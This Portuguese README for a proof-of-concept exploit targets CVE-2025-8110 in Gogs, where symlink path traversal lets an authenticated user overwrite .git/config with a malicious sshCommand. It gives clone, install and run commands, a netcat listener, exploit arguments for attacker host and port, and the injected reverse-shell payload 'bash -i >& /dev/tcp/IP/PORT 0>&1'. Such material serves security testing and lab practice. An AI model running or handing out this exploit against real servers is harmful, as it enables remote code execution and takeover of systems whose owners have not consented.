
Exploit de prova de conceito para CVE-2025-8110, uma vulnerabilidade de RCE no Gogs que explora path traversal via links simbólicos e injeção de sshCommand para entregar uma reverse shell.
Uma Prova de Conceito (PoC) para CVE-2025-8110, uma vulnerabilidade crítica no Gogs que permite Execução Remota de Código (RCE) via manipulação de .git/config usando bypass de links simbólicos e injeção de sshCommand.
Este exploit visa uma falha de Path Traversal no gerenciamento de conteúdo da API do Gogs. Um usuário autenticado pode:
.git/config interno.sshCommand malicioso para executar um Reverse Shell quando o servidor realizar operações Git.!, @).Rich.git clone https://github.com/Ghxstsec/CVE-2025-8110.git
cd CVE-2025-8110
Instale as dependências:
pip3 install -r requirements.txt
💻 Uso
Inicie seu listener:
nc -lvnp 6666
Execute o exploit:
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'
Argumentos:
| Argumento | Descrição |
|---|---|
-u, --url | URL base da instância Gogs alvo (ex.: http://target.htb:3000). |
-lh, --host | IP do atacante (LHOST) para onde o reverse shell se conectará. |
-lp, --port | Porta do Listener (LPORT) configurada na sua máquina. |
-p, --password | Senha para a conta pwnuser realizar a autenticação. |
-x, --proxy | (Opcional) Roteia o tráfego através de um proxy local (padrão: http://localhost:8080). |
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
Quando o Gogs executa um comando Git que requer transporte de rede (como uma sincronização de mirror ou verificação de referência interna), ele invoca o sshCommand, acionando o reverse shell.